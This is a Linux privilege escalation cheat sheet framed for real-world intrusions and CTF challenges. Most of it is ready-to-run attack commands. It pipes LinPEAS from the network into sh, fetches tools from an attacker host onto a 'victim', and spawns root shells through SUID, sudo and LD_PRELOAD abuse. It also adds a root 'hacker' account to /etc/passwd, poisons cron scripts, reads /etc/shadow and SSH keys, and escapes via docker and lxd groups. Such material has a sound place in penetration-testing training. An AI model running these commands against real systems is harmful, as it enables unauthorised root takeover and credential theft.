Privilege escalation involves exploiting misconfigurations or vulnerabilities to move from a low-privileged user (www-data, normal user) to root. It is a critical phase in any real-world intrusion or CTF challenge.
# Download and run LinPEAS directly on target:
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Transfer from attacker machine (HTTP server):
# On attacker:
python3 -m http.server 8000
# On victim:
wget http://YOUR_IP:8000/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh 2>/dev/null | tee /tmp/linpeas_output.txt
# Show only high-criticality findings:
/tmp/linpeas.sh -a 2>/dev/null | grep -E "\[.\+.\]|\[!\]"# Find SUID binaries:
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Dangerous SUID examples:
# /usr/bin/find — execute command as root:
find /tmp -exec /bin/bash -p \; 2>/dev/null
# /usr/bin/vim — open shell:
vim -c ':!/bin/bash'
# /usr/bin/python3:
python3 -c 'import os; os.execl("/bin/bash","bash","-p")'
# /usr/bin/cp — overwrite /etc/passwd:
openssl passwd -1 hacked123
echo "hacker:HASH:0:0:root:/root:/bin/bash" >> /etc/passwd
su hacker# Check allowed sudo commands:
sudo -l
# Common exploitable entries:
# (ALL) NOPASSWD: /usr/bin/python3
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
# (ALL) NOPASSWD: /usr/bin/find
sudo find / -exec /bin/bash \; -quit
# (ALL) NOPASSWD: /usr/bin/less
sudo less /etc/passwd
# inside less: !bash
# LD_PRELOAD technique (if env_keep+=LD_PRELOAD in sudoers):
cat > /tmp/shell.c << 'EOF'
#include
#include
#include
void _init() {
unsetenv("LD_PRELOAD");
setgid(0); setuid(0);
system("/bin/bash");
}
EOF
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so allowed_command # List system cron jobs:
cat /etc/crontab
ls -la /etc/cron.d/ /etc/cron.daily/
crontab -l
# Monitor running processes to catch crons (pspy64):
wget http://YOUR_IP:8000/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64
/tmp/pspy64
# If a cron executes a script we can write to:
echo 'chmod +s /bin/bash' >> /path/to/script.sh
# Wait for cron to run, then:
/bin/bash -p# Search for hardcoded passwords:
grep -r "password" /etc/ 2>/dev/null | grep -v "^Binary"
grep -r "passwd\|secret\|credential" /var/www/ 2>/dev/null
# Command history:
cat ~/.bash_history
cat ~/.zsh_history
# SSH keys:
find /home -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null
# SQLite databases with hashes:
find / -name "*.db" -o -name "*.sqlite" 2>/dev/null# Find services only listening on localhost:
ss -tlnp
netstat -tlnp 2>/dev/null
# Forward internal port to attacker machine via SSH:
ssh -L 8080:127.0.0.1:8080 user@victim
# Access from browser at localhost:8080# Check current user groups:
id
groups
# docker group — mount host filesystem:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# disk group — read disk blocks directly:
debugfs /dev/sda1
debugfs: cat /etc/shadow
# lxd/lxc group:
lxc init ubuntu:16.04 test -c security.privileged=true
lxc config device add test mydev disk source=/ path=/mnt/root recursive=true
lxc start test && lxc exec test /bin/sh| Vector | Check Command |
|---|---|
| Dangerous SUID | find / -perm -4000 -type f 2>/dev/null |
| Sudo permissions | sudo -l |
| System cron jobs | cat /etc/crontab |
| Live processes | ./pspy64 |
| Passwords in configs | grep -r "password" /etc/ 2>/dev/null |
| Internal ports | ss -tlnp |
| Dangerous groups | id → docker, disk, lxd |
| Auto-enumeration | ./linpeas.sh |